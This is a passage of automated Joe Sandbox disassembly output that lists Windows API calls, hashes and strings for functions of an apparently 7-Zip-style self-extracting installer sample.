                                              • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                              • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                              • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                              • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                              • GetParent.USER32(?), ref: 00406B43
                                              • GetClientRect.USER32(00000000,?), ref: 00406B55
                                              • ClientToScreen.USER32(?,?), ref: 00406B68
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                              • GetClientRect.USER32(?,?), ref: 00406C55
                                              • ClientToScreen.USER32(?,?), ref: 00406B71
                                                • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                              • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                              • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                              • String ID:
                                              • API String ID: 747815384-0
                                              • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                              • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                              • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                              • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                              • LoadIconW.USER32(00000000), ref: 00407D33
                                              • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                              • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                              • LoadImageW.USER32(00000000), ref: 00407D54
                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                              • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                              • GetWindow.USER32(?,00000005), ref: 00407E76
                                              • GetWindow.USER32(?,00000005), ref: 00407E92
                                              • GetWindow.USER32(?,00000005), ref: 00407EAA
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                              • LoadIconW.USER32(00000000), ref: 00407F0D
                                              • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                              • SendMessageW.USER32(00000000), ref: 00407F2F
                                                • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                              • String ID:
                                              • API String ID: 1889686859-0
                                              • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                              • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                              • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                              • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                              APIs
                                              • GetParent.USER32(?), ref: 00406F45
                                              • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                              • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                              • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                              • GetWindowDC.USER32(?), ref: 00406FAA
                                              • GetWindowRect.USER32(?,?), ref: 00406FB7
                                              • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                              • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                              • String ID:
                                              • API String ID: 2586545124-0
                                              • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                              • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                              • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                              • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                              APIs
                                              • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                              • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                              • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                              • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                              • GetDlgItem.USER32(?,?), ref: 004067CC
                                              • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                              • GetDlgItem.USER32(?,?), ref: 004067DD
                                              • SetFocus.USER32(00000000,?,000004B4,771B0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ItemMessageSend$Focus
                                              • String ID:
                                              • API String ID: 3946207451-0
                                              • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                              • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                              • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                              • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: IA$IA$IA$IA$IA$IA
                                              • API String ID: 613200358-3743982587
                                              • Opcode ID: 7bf6366eaeb9bbf76c532100fed42691efd9f5029ef601207ee84b3e2d581991
                                              • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                              • Opcode Fuzzy Hash: 7bf6366eaeb9bbf76c532100fed42691efd9f5029ef601207ee84b3e2d581991
                                              • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                              • API String ID: 613200358-994561823
                                              • Opcode ID: ae15d440c4b3d9e9647c267e6cb73c3fb3bce30d1f7753c80179b2736dd90873
                                              • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                              • Opcode Fuzzy Hash: ae15d440c4b3d9e9647c267e6cb73c3fb3bce30d1f7753c80179b2736dd90873
                                              • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                              APIs
                                              • memcpy.MSVCRT ref: 00406DD1
                                              • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                              • GetDC.USER32(00000000), ref: 00406DFB
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                              • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                              • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                              • String ID:
                                              • API String ID: 2693764856-0
                                              • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                              • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                              • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                              • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                              APIs
                                              • GetDC.USER32(?), ref: 0040696E
                                              • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                              • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                              • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                              • SelectObject.GDI32(?,?), ref: 004069B8
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                              • SelectObject.GDI32(?,?), ref: 004069F9
                                              • ReleaseDC.USER32(?,?), ref: 00406A08
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                              • String ID:
                                              • API String ID: 2466489532-0
                                              • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                              • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                              • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                              • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                              • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                              • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                              • wsprintfW.USER32 ref: 00407BBB
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00407C53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                              • String ID: %d%%
                                              • API String ID: 3753976982-1518462796
                                              • Opcode ID: 2bd2451f76b80849c6418f82676d6df1705c30d3159f35cfb992603c3dda1804
                                              • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                              • Opcode Fuzzy Hash: 2bd2451f76b80849c6418f82676d6df1705c30d3159f35cfb992603c3dda1804
                                              • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                              APIs
                                              • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404156
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040415E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040416D
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404175
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$CharUpper$lstrlen
                                              • String ID: hAA
                                              • API String ID: 2587799592-1362906312
                                              • Opcode ID: 7b402cfd4295d74016b5bb06b24dac46c55acb133b38499d32aec029f1527224
                                              • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                              • Opcode Fuzzy Hash: 7b402cfd4295d74016b5bb06b24dac46c55acb133b38499d32aec029f1527224
                                              • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404D3E
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404DA0
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404DB8
                                                • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT ref: 0040349D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                              • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                              • API String ID: 4038993085-2279431206
                                              • Opcode ID: 0c97e79e0e479b0f1639f596d6500e2484b74b374b2f73479e45b6ab58c67410
                                              • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                              • Opcode Fuzzy Hash: 0c97e79e0e479b0f1639f596d6500e2484b74b374b2f73479e45b6ab58c67410
                                              • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                              APIs
                                              • EndDialog.USER32(?,00000000), ref: 00407579
                                              • KillTimer.USER32(?,00000001), ref: 0040758A
                                              • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                              • SuspendThread.KERNEL32(00000298), ref: 004075CD
                                              • ResumeThread.KERNEL32(00000298), ref: 004075EA
                                              • EndDialog.USER32(?,00000000), ref: 0040760C
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: DialogThreadTimer$KillResumeSuspend
                                              • String ID:
                                              • API String ID: 4151135813-0
                                              • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                              • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                              • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                              • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404E85
                                                • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT ref: 004043B6
                                              • ??3@YAXPAX@Z.MSVCRT ref: 00404EAB
                                              • wsprintfA.USER32 ref: 00404EBC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@$wsprintf
                                              • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                              • API String ID: 2704270482-1550708412
                                              • Opcode ID: b4eeade62b7bdf8fd6b73ce6cbeef51f2d63b9a6d8460ee019c94cdb70226998
                                              • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                              • Opcode Fuzzy Hash: b4eeade62b7bdf8fd6b73ce6cbeef51f2d63b9a6d8460ee019c94cdb70226998
                                              • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%T/$%%T\
                                              • API String ID: 613200358-2679640699
                                              • Opcode ID: 8304f33198ffb4682febe5eeee520fc38561a9ca8bcc59281fe4561157fed553
                                              • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                              • Opcode Fuzzy Hash: 8304f33198ffb4682febe5eeee520fc38561a9ca8bcc59281fe4561157fed553
                                              • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%S/$%%S\
                                              • API String ID: 613200358-358529586
                                              • Opcode ID: c3772fe1aa1df8e3f102d6bd155878a24c20079af850fd37df3a213335787ddc
                                              • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                              • Opcode Fuzzy Hash: c3772fe1aa1df8e3f102d6bd155878a24c20079af850fd37df3a213335787ddc
                                              • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1407693664.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.1407677693.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407713915.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407730153.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000007.00000002.1407746255.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%M/$%%M\
                                              • API String ID: 613200358-4143866494
                                              • Opcode ID: 4bf28155caf3c0e3e70e3806f95481066414134a08221828c68301312901f378
                                              • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
